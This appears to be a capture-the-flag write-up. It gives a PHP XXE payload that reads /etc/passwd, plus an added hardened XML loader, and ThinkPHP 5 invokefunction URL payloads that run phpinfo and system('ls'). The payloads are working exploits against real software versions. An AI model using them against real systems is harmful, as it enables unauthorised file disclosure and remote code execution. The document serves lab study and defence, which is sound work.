1.[PHP]XXE
Since libxml 2.9.0, external entities are not resolved by default, so XXE vulnerabilities have gradually been disappearing.
The XXE vulnerability can be triggered through dom.php, SimpleXMLElement.php and simplexml_load_string.php.
Capture the request with Burp, then modify it to add the payload.
payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
<name>&xxe;</name>
</root>
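A hardened loader for the PHP parsers named above, as an added example that is not part of the original writeup. `load_untrusted_xml` is a hypothetical helper, and it assumes the application never needs a DTD in the XML it accepts.

```php
<?php
// Added example: load_untrusted_xml() is a hypothetical helper, not code from the challenge.
// Weak form: LIBXML_NOENT makes libxml substitute entities, which re-enables
// external entity resolution even on libxml 2.9.0 and later.
//   $doc->loadXML($xml, LIBXML_NOENT);
//   simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);

function load_untrusted_xml(string $xml): SimpleXMLElement
{
    $previous = libxml_use_internal_errors(true); // collect errors instead of emitting warnings
    try {
        $doc = new DOMDocument();
        // No LIBXML_NOENT, LIBXML_DTDLOAD or LIBXML_DTDATTR: entities stay
        // unexpanded and no external DTD is fetched. LIBXML_NONET also blocks
        // network access from the parser.
        if (!$doc->loadXML($xml, LIBXML_NONET)) {
            throw new InvalidArgumentException('Malformed XML');
        }
        // Checked on the parsed tree rather than with a string match, so an
        // alternative encoding of the document cannot hide the DOCTYPE.
        if ($doc->doctype !== null) {
            throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
        }
        return simplexml_import_dom($doc);
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($previous);
    }
}

// Constructed input: the payload from this section.
$payload = <<<'XML'
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
<name>&xxe;</name>
</root>
XML;

try {
    load_untrusted_xml($payload);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
echo load_untrusted_xml('<root><name>alice</name></root>')->name, PHP_EOL;
```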
2.[ThinkPHP]5-Rce
ThinkPHP5 5.0.22 / 5.1.29 remote code execution vulnerability:
Append the following directly after the site URL; the flag is found in the phpinfo output.
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls